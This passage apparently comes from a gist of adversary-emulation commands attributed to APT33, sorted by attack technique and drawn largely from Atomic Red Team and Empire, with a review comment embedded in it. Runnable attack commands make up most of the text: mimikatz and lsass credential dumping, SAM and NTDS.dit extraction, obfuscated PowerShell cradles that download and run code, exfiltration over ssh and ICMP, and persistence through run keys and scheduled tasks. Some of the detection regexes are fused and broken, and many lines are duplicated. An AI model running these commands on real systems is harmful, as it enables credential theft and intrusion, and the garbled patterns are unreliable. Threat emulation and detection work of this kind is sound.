    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}
    ```

    # Actor: APT33
    ## Technique Name: Uncommonly Used Port
    ## Technique Commands

    ```
    test-netconnection -ComputerName google.com -port #{port}
    test-netconnection -ComputerName google.com -port 8081
    telnet google.com #{port}
    telnet google.com 8081
    ```
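Review bot: several of the detection-pattern lines in this deleted file are two patterns run together, so the joined pattern no longer matches the artifact it was written for; the fused lines are in the Credential Dumping block (`\\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security`, an lsass.exe image-path pattern glued to a SAM/Security registry-key pattern), the Registry Run Keys / Startup Folder block (the run-key alternation ends in `Shell Folders\Microsoft\Windows\Start Menu\Programs\Startup`, and the following line is the Startup path written twice back to back), and the Scheduled Task block (`/Create\\Windows\\.+\\schtasks.exe`, a `/Create` argument prepended to the schtasks.exe path pattern). If the replacement file iranian_apit_groups_possible_commands.md is produced by the same script, the join that builds these lists should emit one pattern per line before it is regenerated (and the `apit` in the new filename looks like a typo for `apt`). Two smaller points on the same hunk: every section is headed `# Actor: APT33` although the filename promises APT34 as well, and nearly every Empire module path plus several commands (`getsystem`, the `ssh target.example.com "(cd /etc && tar -zcvf - *)"` line, the four `curl -s -A ...` lines) appear twice in a row, so the per-technique merge should dedupe. The hydra/auth.log excerpt under Brute Force also carries pasted-in spacing (`ssh: //192.168.159.132`, `/ usr / sbin / sshd`) that breaks the command if copied.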
    10,798 changes: 10,798 additions & 0 deletions iranian_apit_groups_possible_commands.md
    10,798 additions, 0 deletions not shown because the diff is too large. Please use a local Git client to view these changes.
  3. MSAdministrator created this gist Jan 3, 2020.
    628 changes: 628 additions & 0 deletions apt33_apt34_possible_commands.md
    ## Technique Commands

    ```
    !=powershell.exe
    nslookup
    !=cmd.exe
    nslookup
    powershell/lateral_movement/invoke_sshcommand
    powershell/lateral_movement/invoke_sshcommand
    ```

    # Actor: APT33
    ## Technique Name: Credential Dumping
    ## Technique Commands

    ```
    hashdump
    mimikatz !lsadump::sam
    hashdump
    run hashdump
    run smart_hashdump
    post/windows/gather/credentials/domain_hashdump
    logonpasswords
    mimikatz !sekurlsa::logonpasswords
    mimikatz !sekurlsa::msv
    mimikatz !sekurlsa::kerberos
    mimikatz !sekurlsa::wdigest
    use mimikatz
    wdigest
    msv
    kerberos
    logonpasswords
    IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
    gsecdump -a
    wce -o output.txt
    reg save HKLM\sam sam
    reg save HKLM\system system
    reg save HKLM\security security
    procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp
    ntdsutil "ac i ntds" "ifm" "create full C:\Atomic_Red_Team" q q
    vssadmin.exe create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE
    reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE
    findstr /S cpassword %logonserver%\sysvol\*.xml
    . $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
    Get-GPPPassword -Verbose
    ntdsutil.exe
    \\Windows\\.+\\lsass.exeHKLM\SAM|HKLM\Security
    \\Windows\\.+\\bcryptprimitives.dll|\\Windows\\.+\\bcrypt.dll|\\Windows\\.+\\ncrypt.dll
    powershell/collection/ChromeDump
    powershell/collection/ChromeDump
    powershell/collection/FoxDump
    powershell/collection/FoxDump
    powershell/collection/ninjacopy
    powershell/collection/ninjacopy
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/add_keepass_config_trigger
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/find_keepass_config
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/get_keepass_config_trigger
    powershell/collection/vaults/keethief
    powershell/collection/vaults/keethief
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/collection/vaults/remove_keepass_config_trigger
    powershell/credentials/enum_cred_store
    powershell/credentials/enum_cred_store
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/cache
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/command
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/dcsync_hashdump
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/extract_tickets
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/golden_ticket
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/logonpasswords
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/lsadump
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/mimitokens
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/sam
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/silver_ticket
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/mimikatz/trust_keys
    powershell/credentials/powerdump
    powershell/credentials/powerdump
    powershell/credentials/vault_credential
    powershell/credentials/vault_credential
    powershell/management/downgrade_account
    powershell/management/downgrade_account
    powershell/management/wdigest_downgrade
    powershell/management/wdigest_downgrade
    powershell/privesc/gpp
    powershell/privesc/gpp
    powershell/privesc/mcafee_sitelist
    powershell/privesc/mcafee_sitelist
    python/collection/linux/hashdump
    python/collection/linux/hashdump
    python/collection/linux/mimipenguin
    python/collection/linux/mimipenguin
    python/collection/osx/hashdump
    python/collection/osx/hashdump
    python/collection/osx/kerberosdump
    python/collection/osx/kerberosdump
    python/management/multi/kerberos_inject
    python/management/multi/kerberos_inject
    python/situational_awareness/network/dcos/etcd_crawler
    python/situational_awareness/network/dcos/etcd_crawler
    ```

    # Actor: APT33
    ## Technique Name: Data Compressed
    ## Technique Commands

    ```
    dir #{input_file} -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    dir $env:USERPROFILE -Recurse | Compress-Archive -DestinationPath $env:USERPROFILE\data.zip
    rar a -r #{output_file} #{input_path} *.txt
    rar a -r %USERPROFILE%\data.rar #{input_path} *.txt
    rar a -r #{output_file} %USERPROFILE% *#{file_extension}
    zip $HOME/data.zip #{input_files}
    zip $HOME/data.zip $HOME/*.txt
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo '#{input_content}' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    test -e $HOME/victim-gzip.txt && gzip -k $HOME/victim-gzip.txt || (echo 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101' >> $HOME/victim-gzip.txt; gzip -k $HOME/victim-gzip.txt)
    tar -cvzf $HOME/data.tar.gz #{input_file_folder}
    tar -cvzf $HOME/data.tar.gz $HOME/$USERNAME
    rar.exe
    powershell/management/zipfolder
    powershell/management/zipfolder
    ```

    # Actor: APT33
    ## Technique Name: Data Encoding
    ## Technique Commands

    ```
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.#{destination_url}
    echo -n 111-11-1111 | base64
    curl -XPOST MTExLTExLTExMTE=.redcanary.com
    ```

    # Actor: APT33
    ## Technique Name: Exfiltration Over Alternative Protocol
    ## Technique Commands

    ```
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh #{user_name}@target.example.com 'cat > /Users.tar.gz.enc'
    tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh atomic@#{domain} 'cat > /Users.tar.gz.enc'
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
    powershell/exfiltration/exfil_dropbox
    powershell/exfiltration/exfil_dropbox
    exfiltration/Invoke_ExfilDataToGitHub
    exfiltration/Invoke_ExfilDataToGitHub
    ```

    # Actor: APT33
    ## Technique Name: Exploitation for Privilege Escalation
    ## Technique Commands

    ```
    getsystem
    getsystem
    bitsadmin.exe
    msbuild.exe *MSBuildShell.csproj
    powershell/privesc/ms16-032
    powershell/privesc/ms16-032
    powershell/privesc/tater
    powershell/privesc/tater
    powershell/privesc/ms16-135
    powershell/privesc/ms16-135
    ```

    # Actor: APT33
    ## Technique Name: Network Sniffing
    ## Technique Commands

    ```
    tcpdump -c 5 -nnni ens33
    tshark -c 5 -i ens33
    tcpdump -c 5 -nnni en0A
    tshark -c 5 -i en0A
    "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    c:\windump.exe
    & "c:\Program Files\Wireshark\tshark.exe" -i Ethernet0 -c 5
    & c:\windump.exe
    powershell/collection/packet_capture
    powershell/collection/packet_capture
    python/collection/linux/sniffer
    python/collection/linux/sniffer
    python/collection/osx/sniffer
    python/collection/osx/sniffer
    ```

    # Actor: APT33
    ## Technique Name: Obfuscated Files or Information
    ## Technique Commands

    ```
    sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
    cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
    chmod +x /tmp/art.sh
    /tmp/art.sh
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    powershell.exe -EncodedCommand $EncodedCommand
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = 'Write-Host "Hey, Atomic!"'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path #{registry_key_storage} -Name Debug -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} Debug).Debug)))"
    $OriginalCommand = '#{powershell_command}'
    $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
    $EncodedCommand =[Convert]::ToBase64String($Bytes)
    $EncodedCommand
    Set-ItemProperty -Force -Path HKCU:Software\Microsoft\Windows\CurrentVersion -Name #{registry_entry_storage} -Value $EncodedCommand
    powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:Software\Microsoft\Windows\CurrentVersion #{registry_entry_storage}).#{registry_entry_storage})))"
    [a-z0-9]{1}.exe
    *.exe \*.exe\:Zone.Identifier:$DATA"
    ```

    # Actor: APT33
    ## Technique Name: PowerShell
    ## Technique Commands

    ```
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
    powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1'); Invoke-BloodHound"
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
    (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
    Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
    $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
    Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name 'atomic_user' -Password ATOM1CR3DT3@M -Description '#{description}'
    New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    New-LocalUser -FullName 'Atomic Red Team' -Name '#{user_name}' -Password #{password} -Description 'Atomic Things'
    powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml');$Xml.command.a.execute | IEX"
    "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct').Exec();close()"
    # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
    reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI="
    iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
    powershell.exe -version 2 -Command Write-Host $PSVersion
    Add-Content -Path $env:TEMP\NTFS_ADS.txt -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
    $streamcommand = Get-Content -Path $env:TEMP\NTFS_ADS.txt -Stream 'streamcommand'
    Invoke-Expression $streamcommand
    excel.exe
    cmd.exe
    powershell.exe
    excel.exe
    powershell.exe
    mshta.exe
    cmd.exe
    powershell.exe
    mshta.exe
    powershell.exe
    powerpoint.exe
    cmd.exe
    powershell.exe
    powerpoint.exe
    powershell.exe
    powershell.exe webClient.DownloadString(
    powershell.exe webClient.DownloadFile
    powershell.exe webClient.DownloadData
    winword.exe
    powershell.exe
    hidden|-enc|-NonI\\Windows\\.+\\WindowsPowerShell\\.+\\powershell.exe
    powershell/lateral_movement/invoke_psremoting
    powershell/lateral_movement/invoke_psremoting
    powershell/management/spawn
    powershell/management/spawn
    python/management/multi/spawn
    python/management/multi/spawn
    ```

    # Actor: APT33
    ## Technique Name: Registry Run Keys / Startup Folder
    ## Technique Commands

    ```
    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "C:\Path\AtomicRedTeam.exe"
    REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\Path\AtomicRedTeam.dll"
    $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
    set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
    Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    \Microsoft\Windows\Start Menu\Programs\Startup|Software\Microsoft\Windows\CurrentVersion\Run|Software\Microsoft\Windows\CurrentVersion\RunOnce|Software\Microsoft\Windows\CurrentVersion\RunOnceEx|Software\Microsoft\Windows\CurrentVersion\RunServicesOnce|Software\Microsoft\Windows\CurrentVersion\RunServices|SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad|Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run|Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders|Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Microsoft\Windows\Start Menu\Programs\Startup
    \Microsoft\Windows\Start Menu\Programs\Startup\Microsoft\Windows\Start Menu\Programs\Startup
    powershell/persistence/elevated/registry
    powershell/persistence/elevated/registry
    powershell/persistence/userland/registry
    powershell/persistence/userland/registry
    ```

    # Actor: APT33
    ## Technique Name: Remote File Copy
    ## Technique Commands

    ```
    rsync -r #{local_path} victim@#{remote_host}:#{remote_path}
    rsync -r /tmp/adversary-rsync/ victim@#{remote_host}:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:#{remote_path}
    rsync -r #{local_path} #{username}@victim-host:/tmp/victim-files
    rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}
    rsync -r adversary@#{remote_host}:#{remote_path} /tmp/victim-files
    rsync -r #{username}@adversary-host:#{remote_path} #{local_path}
    rsync -r #{username}@adversary-host:/tmp/adversary-rsync/ #{local_path}
    scp #{local_file} victim@#{remote_host}:#{remote_path}
    scp /tmp/adversary-scp victim@#{remote_host}:#{remote_path}
    scp #{local_file} #{username}@victim-host:#{remote_path}
    scp #{local_file} #{username}@victim-host:/tmp/victim-files/
    scp adversary@#{remote_host}:#{remote_file} #{local_path}
    scp adversary@#{remote_host}:/tmp/adversary-scp #{local_path}
    scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    scp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
    sftp victim@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'
    sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'
    sftp #{username}@victim-host:/tmp/victim-files/ <<< $'put #{local_file}'
    sftp adversary@#{remote_host}:#{remote_file} #{local_path}
    sftp adversary@#{remote_host}:/tmp/adversary-sftp #{local_path}
    sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/
    sftp #{username}@adversary-host:#{remote_file} /tmp/victim-files/
    cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt
    cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f #{remote_file}
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
    New-Item -Path $datePath -ItemType Directory
    Set-Location $datePath
    certutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}
    C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} Atomic-license.txt
    C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}
    (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "Atomic-license.txt")
    (New-Object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt", "Atomic-license.txt")
    ```

    # Actor: APT33
    ## Technique Name: Scheduled Task
    ## Technique Commands

    ```
    schtasks [/s HOSTNAME]
    shell schtasks
    Creating a scheduled task:
    schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    net start schedule
    sc config schedule start= auto
    Creating a scheduled task:
    shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
    Requirements for running scheduled tasks:
    shell net start schedule
    shell sc config schedule start= auto
    at 13:20 /interactive cmd
    SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST #{time}
    SCHTASKS /Create /S #{target} /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    SCHTASKS /Create /S localhost /RU DOMAIN\user /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
    $Action = New-ScheduledTaskAction -Execute "calc.exe"
    $Trigger = New-ScheduledTaskTrigger -AtLogon
    $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
    $Set = New-ScheduledTaskSettingsSet
    $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
    Register-ScheduledTask AtomicTask -InputObject $object
    schtask.exe /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
    schtask.exe /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
    at.exe ##:## /interactive cmd
    at.exe \\[computername|IP] ##:## c:\temp\evil.bat
    net.exe use \\[computername|IP] /user:DOMAIN\username password
    net.exe time \\[computername|IP]
    schtasks.exe /create * appdata
    \\Windows\\.+\\at.exe
    /Create\\Windows\\.+\\schtasks.exe
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/lateral_movement/new_gpo_immediate_task
    powershell/persistence/elevated/schtasks
    powershell/persistence/elevated/schtasks
    powershell/persistence/userland/schtasks
    powershell/persistence/userland/schtasks
    ```

    # Actor: APT33
    ## Technique Name: Standard Application Layer Protocol
    ## Technique Commands

    ```
    Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).example.com" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
